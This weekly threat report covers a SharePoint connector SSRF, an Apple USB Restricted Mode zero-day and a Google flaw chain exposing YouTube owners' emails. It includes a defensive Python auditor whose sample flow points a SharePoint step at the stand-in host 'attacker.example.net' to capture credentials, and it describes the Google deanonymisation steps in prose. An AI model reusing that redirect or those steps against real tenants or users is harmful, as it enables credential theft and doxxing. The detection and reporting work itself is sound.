17.02.25 Threat Report
This week's Threat Report includes a critical Microsoft SharePoint Connector vulnerability, an Apple zero-day exploited in targeted attacks, and a Google flaw that exposed YouTube users' email addresses.
1. Microsoft SharePoint Connector Vulnerability: Credential Theft Risk
A severe server-side request forgery (SSRF) vulnerability (CVE-2024-49070) in Microsoft Power Platform’s SharePoint connector allowed an attacker to redirect the connector’s outbound requests, which carry the calling user’s SharePoint credentials, to a server they controlled, steal those credentials, and impersonate victims across the Microsoft services built on the connector, including:
- Power Apps
- Power Automate
- Copilot Studio
- Copilot 365
This vulnerability posed a significant risk to organisations relying on SharePoint for data management and collaboration.
How the Attack Happened:
Researcher Dmitry Lozovoy found that the SharePoint connector did not validate URL parameters supplied through its “custom value” option. An attacker able to build a flow or app could point such a value at a URL they controlled, so the connector sent its request, together with the victim’s SharePoint credentials, to the attacker instead of to SharePoint. With the stolen credentials an attacker could:
✅ Execute unauthorised actions on behalf of victims.
✅ Access sensitive data, including user directories and document libraries.
✅ Escalate privileges within the organisation’s Microsoft 365 tenant.
Microsoft’s Response & Patch Details:
Microsoft patched the flaw in December 2024, classifying it as an Elevation of Privilege vulnerability. The affected systems include:
✅ SharePoint Server 2016, 2019, and Subscription Edition
✅ Power Platform services, including connectors for Power Apps and Automate
Recommendations:
🔹 Install the latest security updates.
🔹 Restrict the Environment Maker and Basic User roles to trusted personnel; these low-privilege roles were all an attacker needed to create the malicious flow or app.
🔹 Audit flows and apps for SharePoint connector steps whose site address or other URL values point outside your tenant’s SharePoint hosts, or are set at run time by an expression.
🔹 Train employees on phishing risks and unauthorised consent requests.
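The audit in the recommendations above can be scripted against exported flow definitions. The following is an added example written for this report, not Microsoft’s or the researcher’s code: it walks a Power Automate flow definition in the exported JSON shape (properties, then definition, then triggers and actions, with SharePoint steps identified by the connector apiId and the Site Address carried in the dataset parameter) and flags every SharePoint step whose Site Address is a literal off-tenant URL, uses a non-https scheme, or is a run-time expression that cannot be judged statically. The tenant allowlist, the attacker host and the sample flow are constructed for the example.

```python
import json
import sys
from urllib.parse import urlparse

# Hypothetical tenant allowlist (assumption for this example): the SharePoint
# hosts that flows in this tenant are expected to use as a Site Address.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

# apiId of the SharePoint Online connector as it appears in exported flow
# definitions, and the parameter name that carries the "Site Address" value.
SP_API = "/providers/Microsoft.PowerApps/apis/shared_sharepointonline"
SP_API_SUFFIX = "/apis/shared_sharepointonline"
SITE_PARAMS = ("dataset",)

# Constructed sample definition (not a real export) in the exported shape:
# properties -> definition -> triggers/actions; container actions such as
# Scope carry their own nested "actions" map.
SAMPLE_FLOW = {
    "properties": {
        "definition": {
            "triggers": {
                "When_an_item_is_created": {
                    "type": "OpenApiConnectionWebhook",
                    "inputs": {
                        "host": {"apiId": SP_API, "operationId": "GetOnNewItems"},
                        "parameters": {"dataset": "https://contoso.sharepoint.com/sites/Finance", "table": "a1b2"},
                    },
                }
            },
            "actions": {
                "Get_items": {
                    "type": "OpenApiConnection",
                    "inputs": {
                        "host": {"apiId": SP_API, "operationId": "GetItems"},
                        "parameters": {"dataset": "https://contoso.sharepoint.com/sites/Finance", "table": "a1b2"},
                    },
                },
                "Scope": {
                    "type": "Scope",
                    "actions": {
                        "Get_file_content": {
                            "type": "OpenApiConnection",
                            "inputs": {
                                "host": {"apiId": SP_API, "operationId": "GetFileContent"},
                                # Custom value: the connector would call this host instead of SharePoint.
                                "parameters": {"dataset": "https://attacker.example.net/", "id": "q1.xlsx"},
                            },
                        },
                        "Get_items_2": {
                            "type": "OpenApiConnection",
                            "inputs": {
                                "host": {"apiId": SP_API, "operationId": "GetItems"},
                                # Expression, not a literal: the real target is decided at run time.
                                "parameters": {"dataset": "@variables('siteUrl')", "table": "a1b2"},
                            },
                        },
                    },
                },
            },
        }
    }
}


def _sharepoint_steps(node, path=()):
    """Yield (path, inputs) for every trigger/action bound to the SharePoint connector."""
    if isinstance(node, dict):
        inputs = node.get("inputs")
        if isinstance(inputs, dict):
            host = inputs.get("host")
            if isinstance(host, dict) and str(host.get("apiId", "")).endswith(SP_API_SUFFIX):
                yield path, inputs
        for key, child in node.items():
            yield from _sharepoint_steps(child, path + (str(key),))
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from _sharepoint_steps(child, path + (str(i),))


def classify_site_address(value, allowed_hosts=ALLOWED_HOSTS):
    """Return (severity, reason) for one Site Address value."""
    if not isinstance(value, str) or not value:
        return "ok", "no site address"
    if value.startswith("@"):
        # Workflow expression: cannot be judged statically, so send it for review.
        return "review", "site address is an expression; resolve and verify manually"
    parsed = urlparse(value)
    if parsed.scheme != "https":
        return "high", f"site address uses scheme {parsed.scheme!r}, not https"
    host = (parsed.hostname or "").lower()
    if host in allowed_hosts:
        return "ok", "approved SharePoint host"
    return "high", f"site address host {host!r} is not an approved SharePoint host"


def audit_flow(flow, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for SharePoint steps whose Site Address is off-tenant or dynamic."""
    findings = []
    for path, inputs in _sharepoint_steps(flow):
        params = inputs.get("parameters") or {}
        for name in SITE_PARAMS:
            severity, reason = classify_site_address(params.get(name), allowed_hosts)
            if severity != "ok":
                findings.append({
                    "step": "/".join(path),
                    "operation": inputs["host"].get("operationId", "?"),
                    "value": params.get(name),
                    "severity": severity,
                    "reason": reason,
                })
    return findings


def load_flow(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


if __name__ == "__main__":
    # Pass one or more exported flow JSON files; with none, audit the sample.
    flows = [load_flow(p) for p in sys.argv[1:]] or [SAMPLE_FLOW]
    for flow in flows:
        for f in audit_flow(flow):
            print(f"[{f['severity']}] {f['step']} ({f['operation']}): {f['value']} - {f['reason']}")
```

Run it against each exported flow definition in an environment; a “high” finding is a step that will send the connector’s request, and the user’s SharePoint credentials, to a non-tenant host, and a “review” finding is a step whose target is only known at run time and should be resolved by hand. Extend SITE_PARAMS if your exports carry the site address under a different parameter name for some operations.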
2. Apple Zero-Day Vulnerability Exploited in Targeted Attacks
Apple has released iOS 18.3.1 and iPadOS 18.3.1 to fix a zero-day vulnerability (CVE-2025-24200) that allowed an attacker with physical access to disable USB Restricted Mode on a locked device. Apple says the flaw may have been exploited in an extremely sophisticated attack against specific targeted individuals.
How the Attack Happened:
Apple’s USB Restricted Mode blocks data connections over the device’s USB/Lightning port once the device has been locked for about an hour, so that a locked phone cannot be read by a connected computer or extraction tool. The flaw, an authorisation issue in the Accessibility framework, allowed an attacker with physical access to switch that protection off on a locked device. Disabling the mode does not unlock the device by itself, but it reopens the data path that forensic extraction tools depend on.
The vulnerability was discovered by Bill Marczak from The Citizen Lab at the University of Toronto’s Munk School.
Apple’s Response & Patch Details:
Apple addressed the issue by improving state management within the system. The fix applies to:
✅ iPhone XS and later models
✅ Supported iPad Pro, iPad Air, iPad and iPad mini models (see Apple’s advisory for the exact generations)
Recommendations:
🔹 Update to iOS 18.3.1/iPadOS 18.3.1 immediately.
🔹 USB Restricted Mode is on by default; confirm it has not been turned off under Settings > Face ID & Passcode (or Touch ID & Passcode) > Allow Access When Locked > Accessories, which should be off. On supervised devices, enforce it through the MDM restriction allowUSBRestrictedMode.
🔹 Restrict physical access to sensitive devices.
🔹 Use Mobile Threat Defence (MTD) solutions to detect potential attacks.
3. Google Flaws Allowed YouTube IDs to Reveal Gmail Addresses
Security researcher Brutecat uncovered two weaknesses in Google’s systems that, chained together, exposed YouTube channel owners’ email addresses, contrary to Google’s assurance that a channel does not reveal the account behind it.
How the Attack Happened:
By chaining the two issues, Brutecat could go from a YouTube channel to its owner’s Gaia ID (the identifier Google’s unified account system uses internally) and from that Gaia ID to a Gmail address:
1️⃣ People API abuse: blocking a YouTube user returned the blocked account’s Gaia ID in the response.
2️⃣ Pixel Recorder leak: sharing a recording with that Gaia ID through the Pixel Recorder web app returned the recipient’s email address in the response to the share request.
🔹 To stop the target from being tipped off, a Python script gave the recording a 2.5-million-character name, which caused the share notification email to fail to send.
Google’s Response & Patch Details:
Google initially classified the vulnerability as low risk, awarding $3,133 in its bug bounty program. However, recognising the high potential for exploitation, the company increased the bounty to $10,633 and fixed both issues.
Potential Risks:
⚠️ Targeted phishing attacks exploiting exposed Gmail addresses.
⚠️ Doxxing risks for YouTube creators and journalists.
⚠️ Credential stuffing attacks that pair the exposed address with passwords from earlier breaches.
Recommendations:
🔹 Treat internal account identifiers as sensitive: an API should not translate one identifier into another (for example an account ID into an email address) unless the caller is authorised to see both.
🔹 Strengthen multi-factor authentication (MFA) for high-risk accounts.
🔹 Educate employees on phishing risks and email exposure.
🔹 Review APIs for information disclosure in their responses, including fields the user interface never displays, and enforce strict access controls.